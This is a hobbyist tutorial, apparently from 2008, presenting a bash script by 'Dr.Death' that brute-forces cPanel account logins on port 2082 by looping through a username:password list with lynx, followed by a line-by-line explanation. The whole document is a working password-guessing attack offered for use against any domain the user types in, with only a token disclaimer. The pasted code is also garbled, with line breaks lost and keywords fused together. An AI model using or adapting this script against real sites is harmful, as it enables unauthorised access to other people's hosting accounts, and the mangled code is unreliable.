Hello, did you ever try to brute force a website login page and you didn't find the right tool?
it always happen, so i will explain how i did it with linux shell script.
I wrote a small script to brute force Cpanel accounts:
============================================
#!/usr/bin/env bash# Cpanel BruteForce v1.0# Coded By Dr.Death 2008# drdeath[at]bsdmail.org## This is a simple script that will brute force Cpanel account ## I do not take any reponsibilty for what you do with this tool# Hopefully it will make your life easier rather then making other# peoples lives more difficult!############################## _____ _____ _ _
# | __ \ | __ \ | | | |
# | | | |_ __| | | | ___ __ _| |_| |__
# | | | | '__| | | |/ _ \/ _` | __| '_ \
# | |__| | | _| |__| | __/ (_| | |_| | | |
# |_____/|_|(_)_____/ \___|\__,_|\__|_| |_|
#############################
echo ".::Cpanel BruteForcer By Dr.Death::."
echoecho -n "Enter domain name for the Cpanel account you want bruteforce:
> "
read site
n=
`cat pass_list | wc -l`for (( i=1; i <=
$n; i++));
dopassword=
`sed -n "$i"p pass_list`b=
`lynx -dump -nolist -auth="$password" ""$site":2082"`echo trying password
$passwordif [ !
-z "$b" ];
thenecho "Bengo WebSite "
$site" password is: "
$password""
echo "Have Fun ;)"
exit 0fidoneechoecho "brute force complete"
echo "no luck, try better dictionary"
exit==========================================
lets explain what we did:
to execute the script using bash shell from the environment "env".
set the user input as variable "
$site" which will be the website domain name.
- n=`cat pass_list | wc -l`
this will print how many lines in file "pass_list" which include passwords list.
- for (( i=1; i <= $n; i++));
we put the number we got for the variable "
$n" in a for loop, so for example if file pass_list have 1000 password on it we will do the for loop 1000 time, to try all the passwords.
- password=`sed -n "$i"p pass_list`
here we use "
sed" the steam editor with option "p" to print all the passwords in the pass_list in each loop.
for example in loop number 4 variable
$i will have value of 4 and the sed comand will be like this:
"sed -n 4p pass_list" which will print the 4th line from the password file pass_list.
- b=`lynx -dump -nolist -auth="$password" ""$site":2082"`
here we use "
lynx" the linux command line browser as a socket to connect to the target website.
we use option
"-dump" to dump the output instead of waiting user action,
"-nolist" to disable the link list feature in dumps,
"-auth=" use to set authorization ID and password for protected
documents.
for example to access cpanel account for website
"example.com" with username
"user" and password
"pass" it will be like this:
"lynx -dump -nolist -auth=user:pass http://www.example.com:2082"so password file pass_list should include the usernames and passwords in this format:
"username:password"here we use if statment with option
"! -z" which mean if value of
"$b" is not equal to Zero we are logged in and the password is the value of the variable
"$password" in the loop we are in and exit successfuly, else continue the loop.
Thats all falks :)
Dr.Death